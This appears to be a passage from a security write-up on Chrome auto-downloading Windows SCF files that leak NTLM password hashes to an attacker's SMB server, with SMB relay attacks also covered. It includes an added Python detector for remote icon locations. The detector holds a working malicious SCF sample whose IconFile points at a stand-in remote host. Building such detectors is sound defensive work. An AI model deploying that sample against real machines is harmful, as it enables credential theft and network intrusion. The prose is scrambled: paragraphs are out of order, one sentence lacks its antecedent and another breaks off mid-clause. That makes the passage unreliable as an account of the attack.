With its default configuration, Chrome automatically downloads files it deems safe without prompting the user for a download location, saving them to the preset one instead. From a security standpoint this default is not ideal behavior, but any malicious content that slips through still requires the user to manually open or run the file to do any damage. Chrome sanitizes LNK files by forcing a different extension on them, a measure in place ever since Stuxnet [3], but it does not give the same treatment to SCF files.

All tested security solutions failed to flag the file as anything suspicious, which we hope will change soon.

SCF file analysis would be easy to implement, as it only requires inspecting the icon-location parameter, considering there are no legitimate uses of SCF files with remote icon locations.
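The check described above, as an added example that is not part of the original article: it parses the key/value lines of an SCF file and flags an icon location that would make Explorer reach out over the network. The IconFile key name is assumed from the SCF format, and the sample files are constructed for the example.

```python
"""Flag Windows SCF files whose icon location points at a remote host."""
import re

# Assumption: the icon location lives in the IconFile key of the SCF file.
ICON_KEY = "iconfile"

# A remote icon location is anything Explorer would fetch over the network:
# a UNC path (\\host\share or //host/share) or a URL with a host component
# (http://host/..., https://host/..., file://host/...). Local device and
# extended-length prefixes (\\.\ and \\?\) are not remote and are skipped.
_REMOTE = re.compile(
    r"^(?:\\\\|//)[^\\/?.][^\\/]*|^(?:https?|file)://[^/\\]+", re.IGNORECASE
)


def parse_scf(text):
    """Return the key/value pairs of an INI-like SCF file, keys lower-cased."""
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#", "[")):
            continue  # blank line, comment or section header
        key, sep, value = line.partition("=")
        if sep:
            entries[key.strip().lower()] = value.strip().strip('"')
    return entries


def remote_icon(text):
    """Return the remote icon target, or None when the SCF only uses local icons."""
    value = parse_scf(text).get(ICON_KEY)
    if value and _REMOTE.match(value):
        return value
    return None


# Constructed samples: a legitimate "Show Desktop" SCF and one whose icon
# points at a host in the TEST-NET-3 documentation range.
BENIGN_SCF = (
    "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)
MALICIOUS_SCF = (
    "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.5\\share\\test.ico\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SCF), ("malicious", MALICIOUS_SCF)):
        print(name, "->", remote_icon(sample))
```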

This enables the attacker to capture a hash that can be cracked many times faster than NTLMv2; in the case of LM, often within seconds using precomputed tables for reversing cryptographic hash functions ("rainbow tables").

SMB Relay Attacks

Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as the authentication method may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim and access data and systems without having to crack the password.

There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the "icon".

The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking, or to relay the connection to an externally available service that accepts the same kind of authentication (e.g.

This was successfully demonstrated by Jonathan Brossard [4] at the Black Hat security conference.

Under certain conditions (external exposure), an attacker may even be able to relay credentials to a domain controller on the victim's network and essentially gain internal access to the network.

Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead.

